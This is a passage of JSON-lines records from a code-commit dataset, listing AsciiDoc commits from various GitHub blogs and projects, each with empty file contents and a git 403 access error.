Chamber","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-03-The-iPhone-Torture-Chamber.adoc","new_file":"_posts\/2017-02-03-The-iPhone-Torture-Chamber.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0238fa78810e8f6e4b3b82c41b673b056463a817","subject":"Update 2016-03-30-Las-matematicas-es-mi-amiga.adoc","message":"Update 2016-03-30-Las-matematicas-es-mi-amiga.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-es-mi-amiga.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-es-mi-amiga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a51b8273636c0a70895e823c938ab9ff5ad667e1","subject":"Update 2017-06-13-neural_network_from_scratch.adoc","message":"Update 2017-06-13-neural_network_from_scratch.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2017-06-13-neural_network_from_scratch.adoc","new_file":"_posts\/2017-06-13-neural_network_from_scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5547181c3171f9aad88a87a33be4fc024156d576","subject":"Update 2017-10-27-Episode-116-Tell-Me-A-Story.adoc","message":"Update 
2017-10-27-Episode-116-Tell-Me-A-Story.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-10-27-Episode-116-Tell-Me-A-Story.adoc","new_file":"_posts\/2017-10-27-Episode-116-Tell-Me-A-Story.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4af63807a83d299e60a6416bad7d269f4503c2b5","subject":"Update 2016-03-10-Install-Sentry-with-Docker.adoc","message":"Update 2016-03-10-Install-Sentry-with-Docker.adoc","repos":"natsu90\/hubpress.io,natsu90\/hubpress.io,natsu90\/hubpress.io","old_file":"_posts\/2016-03-10-Install-Sentry-with-Docker.adoc","new_file":"_posts\/2016-03-10-Install-Sentry-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/natsu90\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94d8ae70e2baa0b2cae95e85f5f3eb39c320010a","subject":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","message":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b524ef2902fef99062747b89e98ced692f72f68","subject":"Captain's Log FAQ","message":"Captain's Log FAQ\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"3590c48054b05b7dd3dff2a12ba48e1fdf389da4","subject":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","message":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"611a43d95233985fefae0dfdb14db0c390c6d05a","subject":"Update 2017-04-19-part-1.adoc","message":"Update 2017-04-19-part-1.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-04-19-part-1.adoc","new_file":"_posts\/2017-04-19-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"e4e156bf2792dea4b89a9e69032d43bbdcdb78be","subject":"manual: added the global functions section.","message":"manual: added the global functions section.\n","repos":"bougyman\/void-packages,allan\/void-packages,lodvaer\/void-packages,kylesusername\/void-packages,kokakolako\/void-packages,kylesusername\/void-packages,allan\/void-packages,k00mi\/void-packages,deathsyn\/void-packages,okapia\/void-packages,kylesusername\/void-packages,WKuipers\/void-packages,uriah0\/void-packages,Bubble-be\/void-packages,lodvaer\/void-packages,deathsyn\/void-packages,kulinacs\/void-packages,floGik\/void-packages,k00mi\/void-packages,liwakura\/void-packages,WKuipers\/void-packages,meowstars\/void-packages,eddyb\/void-packages,kulinacs\/void-packages,aisamanra\/void-packages,lodvaer\/void-packages,deathsyn\/void-packages,rfnash\/void-packages,opsaaspo\/void-packages,gangsterakato\/void-packages,jprjr\/void-packages,asafo\/void-packages,juliendehos\/void-packages,tjohann\/void-packages,meowstars\/void-packages,gangsterakato\/void-packages,radare\/void-packages,LockeAnarchist\/void-packages,radare\/void-packages,NeoChontrix\/void-packages,asafo\/void-packages,meowstars\/void-packages,esantoro\/void-packages,samuelchodur\/void-packages,NeoChontrix\/void-packages,WilliamO7\/void-packages,EaterOfCode\/void-packages,lodvaer\/void-packages,WKuipers\/void-packages,WKuipers\/void-packages,allan\/void-packages,aisamanra\/void-packages,opsaaspo\/void-packages,samuelchodur\/void-packages,tjohann\/void-packages,WilliamO7\/void-packages,deathsyn\/void-packages,bougyman\/void-packages,EaterOfCode\/void-packages,opsaaspo\/void-packages,coredumb\/void-packages,bougyman\/void-packages,bougyman\/void-packages,liwakura\/void-packages,jprjr\/void-packages,skrzyp\/void-packages,gangsterakato\/void-packages,Bubble-be\/void-packages,ayghor\/void-packages,EaterOfCode\/void-packages,kokakolako\/void-packages,necrophcodr\/void-packages,liwakura\/void-packages,rfnash\/void-packages,floGik\/void-packages,okapia\/void-packages,NeoChontrix\/void-packages,radare\/void-packages,lodvaer\/void-packages,ylixir\/void-packages,radare\/void-packages,necrophcodr\/void-packages,tjohann\/void-packages,asafo\/void-packages,juliendehos\/void-packages,kylesusername\/void-packages,ylixir\/void-packages,kokakolako\/void-packages,k00mi\/void-packages,asafo\/void-packages,kokakolako\/void-packages,lodvaer\/void-packages,coredumb\/void-packages,juliendehos\/void-packages,tjohann\/void-packages,jprjr\/void-packages,kokakolako\/void-packages,eddyb\/void-packages,liwakura\/void-packages,coredumb\/void-packages,aisamanra\/void-packages,liwakura\/void-packages,kulinacs\/void-packages,WKuipers\/void-packages,Bubble-be\/void-packages,allan\/void-packages,esantoro\/void-packages,samuelchodur\/void-packages,okapia\/void-packages,ylixir\/void-packages,NeoChontrix\/void-packages,floGik\/void-packages,LockeAnarchist\/void-packages,eddyb\/void-packages,juliendehos\/void-packages,ylixir\/void-packages,k00mi\/void-packages,aisamanra\/void-packages,skrzyp\/void-packages,gangsterakato\/void-packages,tjohann\/void-packages,esantoro\/void-packages,juliendehos\/void-packages,floGik\/void-packages,okapia\/void-packages,floGik\/void-packages,WilliamO7\/void-packages,necrophcodr\/void-packages,jprjr\/void-packages,NeoChontrix\/void-packages,meowstars\/void-packages,gangsterakato\/void-packages,Bubble-be\/void-packages,k00mi\/void-packages,ylixir\/void-packages,samuelchodur\/void-packages,ayghor\/void-packages,jprjr\/void-packages,rfnash\/void-packages,meowstars\/void-package
s,bougyman\/void-packages,coredumb\/void-packages,uriah0\/void-packages,uriah0\/void-packages,opsaaspo\/void-packages,EaterOfCode\/void-packages,skrzyp\/void-packages,kylesusername\/void-packages,LockeAnarchist\/void-packages,uriah0\/void-packages,rfnash\/void-packages,LockeAnarchist\/void-packages,opsaaspo\/void-packages,aisamanra\/void-packages,juliendehos\/void-packages,necrophcodr\/void-packages,NeoChontrix\/void-packages,ayghor\/void-packages,jprjr\/void-packages,eddyb\/void-packages,k00mi\/void-packages,skrzyp\/void-packages,eddyb\/void-packages,ayghor\/void-packages,rfnash\/void-packages,asafo\/void-packages,deathsyn\/void-packages,kulinacs\/void-packages,ayghor\/void-packages,WKuipers\/void-packages,coredumb\/void-packages,EaterOfCode\/void-packages,allan\/void-packages,floGik\/void-packages,okapia\/void-packages,samuelchodur\/void-packages,radare\/void-packages,gangsterakato\/void-packages,ayghor\/void-packages,Bubble-be\/void-packages,esantoro\/void-packages,skrzyp\/void-packages,radare\/void-packages,coredumb\/void-packages,uriah0\/void-packages,necrophcodr\/void-packages,opsaaspo\/void-packages,WilliamO7\/void-packages,WilliamO7\/void-packages,esantoro\/void-packages,WilliamO7\/void-packages,liwakura\/void-packages,kulinacs\/void-packages,kulinacs\/void-packages,LockeAnarchist\/void-packages,Bubble-be\/void-packages,kokakolako\/void-packages","old_file":"manual.adoc","new_file":"manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allan\/void-packages.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b71b11dd79c9e6bef6562e261c2215142033fcf1","subject":"Update 2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","message":"Update 2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","new_file":"_posts\/2017-05-20-Stablishing-a-work-flow-of-sorts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a646cc4d80f8d09a130238593f5f664dd58d8d5a","subject":"DOC(README.asciidoc): Update Readme","message":"DOC(README.asciidoc): Update Readme\n","repos":"xmeta\/dinzai-datni","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmeta\/dinzai-datni.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c3fa92abea3104e44f617ce9d30a8d5a4100862","subject":"Add note for using admin server in eureka server","message":"Add note for using admin server in eureka 
server\n","repos":"voltean\/spring-boot-admin,joshiste\/spring-boot-admin,voltean\/spring-boot-admin,librucha\/spring-boot-admin,RobWin\/spring-boot-admin,voltean\/spring-boot-admin,librucha\/spring-boot-admin,joshiste\/spring-boot-admin,RobWin\/spring-boot-admin,librucha\/spring-boot-admin,RobWin\/spring-boot-admin,librucha\/spring-boot-admin,codecentric\/spring-boot-admin,codecentric\/spring-boot-admin,RobWin\/spring-boot-admin,joshiste\/spring-boot-admin,codecentric\/spring-boot-admin,joshiste\/spring-boot-admin","old_file":"spring-boot-admin-docs\/src\/main\/asciidoc\/index.adoc","new_file":"spring-boot-admin-docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshiste\/spring-boot-admin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d23b13ca6fface9f9113e21b5106537dd087eb87","subject":"Update 2016-04-30-Light-weight-Microservices.adoc","message":"Update 2016-04-30-Light-weight-Microservices.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-04-30-Light-weight-Microservices.adoc","new_file":"_posts\/2016-04-30-Light-weight-Microservices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a878833b25906e2fa1d3bbdf06eb8ce6bef28dab","subject":"[Docs] Update links to java9 docs (#28750)","message":"[Docs] Update links to java9 docs (#28750)\n\nCloses #28683","repos":"gingerwizard\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/Versions.asciidoc","new_file":"docs\/Versions.asciidoc","new_contents":"","old_contents":"","ret
urncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"92eae4812764bbb268c3a42e8412a3cc5b9576b2","subject":"Create do-automation-fil.adoc","message":"Create do-automation-fil.adoc\n\nFilipino translation for do-automation.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-automation-fil.adoc","new_file":"src\/do\/do-automation-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2adb3aeb1296a6d28063872eef60ffe4b70bd0af","subject":"installation.adoc: Add openssl and Kerberos dependencies","message":"installation.adoc: Add openssl and Kerberos dependencies\n\nThis adds openssl header and kerberos dependencies to the\nfrom-source installation instructions.\n\nChange-Id: I45b4e064888880e8654a3021a09f38ec9df2c5dd\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4981\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"12089ea6206fa389906351cffa3c79638858975f","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8bc91e85c022d8cae861a958067f9b086444c91","subject":"Updated goals.adoc","message":"Updated goals.adoc","repos":"sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv","old_file":"docs\/goals.adoc","new_file":"docs\/goals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc72cc561edc0040b704a206afacf85d459552d1","subject":"Update 2016-04-07-Banner-grabbing.adoc","message":"Update 
2016-04-07-Banner-grabbing.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84d908d081ffe2e3aee6caf92d9b2dcf7df64932","subject":"Update 2017-09-24-First-Blog-Post.adoc","message":"Update 2017-09-24-First-Blog-Post.adoc","repos":"masonc15\/masonc15.github.io,masonc15\/masonc15.github.io,masonc15\/masonc15.github.io,masonc15\/masonc15.github.io","old_file":"_posts\/2017-09-24-First-Blog-Post.adoc","new_file":"_posts\/2017-09-24-First-Blog-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/masonc15\/masonc15.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a33f7abb7fe7c3047a6faa97656a0f0c9bd80851","subject":"y2b create post Macbook Air Giveaway TOMORROW!","message":"y2b create post Macbook Air Giveaway TOMORROW!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-25-Macbook-Air-Giveaway-TOMORROW.adoc","new_file":"_posts\/2013-01-25-Macbook-Air-Giveaway-TOMORROW.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f772e379c5eba7a3f16b8a84813a92bfffedc031","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccd3874d0ad9a737f69b59f01de1e7059e4c6bde","subject":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","message":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3ccefc6842f150b1816af9677563fe355e5f9ce","subject":"Update 2017-05-21-Drupal-8-Multilingual-Views.adoc","message":"Update 
2017-05-21-Drupal-8-Multilingual-Views.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02278a7a739e296c1856aaa096d085cbecff5da2","subject":"Update 2016-08-04-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","message":"Update 2016-08-04-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-04-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_file":"_posts\/2016-08-04-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42aa6e274767f1790f4e1b6cccb8142405e37e6e","subject":"Update Readme 3.1","message":"Update Readme 3.1\n","repos":"GraphGrid\/neo4j-graphql,GraphGrid\/neo4j-graphql","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GraphGrid\/neo4j-graphql.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e6f5ae52d7d7ae53875f87f3423cbe7a206a0341","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c78c2dc0196f0f3153bbeae9ad44ddb833b7627","subject":"Update 2017-10-15-Why-this-blog.adoc","message":"Update 2017-10-15-Why-this-blog.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-15-Why-this-blog.adoc","new_file":"_posts\/2017-10-15-Why-this-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d769329abba09ded06dbf487f3fb49f8d21cc575","subject":"Dump version to 2.2 as well.","message":"Dump version to 2.2 as 
well.\n","repos":"jotak\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/installation.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7adad571426236046cc235cedece27b7fcbf7c47","subject":"Update 2015-10-08-Merhaba.adoc","message":"Update 2015-10-08-Merhaba.adoc","repos":"topluluk\/blog,topluluk\/blog,topluluk\/blog","old_file":"_posts\/2015-10-08-Merhaba.adoc","new_file":"_posts\/2015-10-08-Merhaba.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topluluk\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44f544731ee55d326ba8a4de86521159f1ff34d9","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f618a1fca66ba5157c89eff700c2818a30086fed","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db3a61eecf79ea4f9344fbae295ab96fc50ac67b","subject":"Adding Debezium 0.9.2 release announcement","message":"Adding Debezium 0.9.2 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-02-25-debezium-0-9-2-final-released.adoc","new_file":"blog\/2019-02-25-debezium-0-9-2-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
